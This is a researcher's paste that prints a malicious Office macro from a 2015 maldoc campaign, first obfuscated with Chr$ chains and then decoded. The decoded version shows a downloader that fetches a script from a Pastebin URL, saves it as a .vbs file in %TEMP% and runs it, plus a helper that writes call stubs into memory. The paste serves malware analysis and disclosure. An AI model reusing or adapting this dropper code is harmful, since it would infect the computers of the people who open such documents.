bartblaze

Extracted + deobfuscated macro

May 8th, 2015
701
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
  2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
  3.  
  4.  
  5. <== obfuscated: ===>
  6. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  7. On Error Resume Next
  8.     Dim UpICsYhhglV                As Long
  9.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  10.     Dim wZdrB                   As Long
  11.     Dim kQJlHFiPhSQwQic                As Long
  12.    
  13.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  14.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  15.    
  16.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
  17.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  18.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
  19.     For wZdrB = UBound(Params) To 0 Step -1
  20.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  21.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  22.     Next
  23.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  24.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
  25.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  26.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  27.    
  28. End Function
  29.  
  30. Sub hfyuBJKfdgfdgsdfg()
  31. ouIYHiogeffjgyuFUFYdsg = Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) & Chr$(58) & Chr$(47) & Chr$(47) & Chr$(112) & Chr$(97) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(98) & Chr$(105) & Chr$(110) & Chr$(46) & Chr$(99) & Chr$(111) & Chr$(109) & Chr$(47) & Chr$(100) & Chr$(111) & Chr$(119) & Chr$(110) & Chr$(108) & Chr$(111) & Chr$(97) & Chr$(100) & Chr$(46) & Chr$(112) & Chr$(104) & Chr$(112) & Chr$(63) & Chr$(105) & Chr$(61) & Chr$(86) & Chr$(84) & Chr$(100) & Chr$(57) & Chr$(72) & Chr$(86) & Chr$(107) & Chr$(122)
  32. Set ertertFFFg = CreateObject(Chr$(77) & Chr$(83) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(50) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  33. Call ertertFFFg.Open(Chr$(71) & Chr$(69) & Chr$(84), ouIYHiogeffjgyuFUFYdsg, False)
  34. ertertFFFg.Send
  35. Set iyuiyui = CreateObject(Chr$(83) & Chr$(99) & Chr$(114) & Chr$(105) & Chr$(112) & Chr$(116) & Chr$(105) & Chr$(110) & Chr$(103) & Chr$(46) & Chr$(70) & Chr$(105) & Chr$(108) & Chr$(101) & Chr$(83) & Chr$(121) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(109) & Chr$(79) & Chr$(98) & Chr$(106) & Chr$(101) & Chr$(99) & Chr$(116))
  36.    ewwfgfdg = Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  37. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  38. riitiyiFF.Write ertertFFFg.ResponseText
  39. riitiyiFF.Close
  40. Set oUIYYytgsdvfFF = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
  41. oUIYYytgsdvfFF.Open Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  42. End Sub
  43.  
  44. =========================================================================================================
  45.  
  46.  
  47.  
  48. <== deobfuscated: ===>
  49. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  50. On Error Resume Next
  51.     Dim UpICsYhhglV                As Long
  52.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  53.     Dim wZdrB                   As Long
  54.     Dim kQJlHFiPhSQwQic                As Long
  55.  
  56.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  57.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  58.  
  59.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
  60.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  61.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
  62.     For wZdrB = UBound(Params) To 0 Step -1
  63.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  64.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  65.     Next
  66.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  67.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
  68.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  69.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  70.  
  71. End Function
  72.  
  73. Sub hfyuBJKfdgfdgsdfg()
  74. ouIYHiogeffjgyuFUFYdsg = http://pastebin.com/download.php?i=VTd9HVkz
  75. Set ertertFFFg = CreateObject(MSXML2.XMLHTTP)
  76. Call ertertFFFg.Open(GET, ouIYHiogeffjgyuFUFYdsg, False)
  77. ertertFFFg.Send
  78. Set iyuiyui = CreateObject(Scripting.FileSystemObject)
  79.    ewwfgfdg = Environ(TEMP)\JGuigbjbff3f.vbs
  80. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  81. riitiyiFF.Write ertertFFFg.ResponseText
  82. riitiyiFF.Close
  83. Set oUIYYytgsdvfFF = CreateObject(Shell.Application)
  84. oUIYYytgsdvfFF.Open Environ(TEMP)\JGuigbjbff3f.vbs
  85. End Sub
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×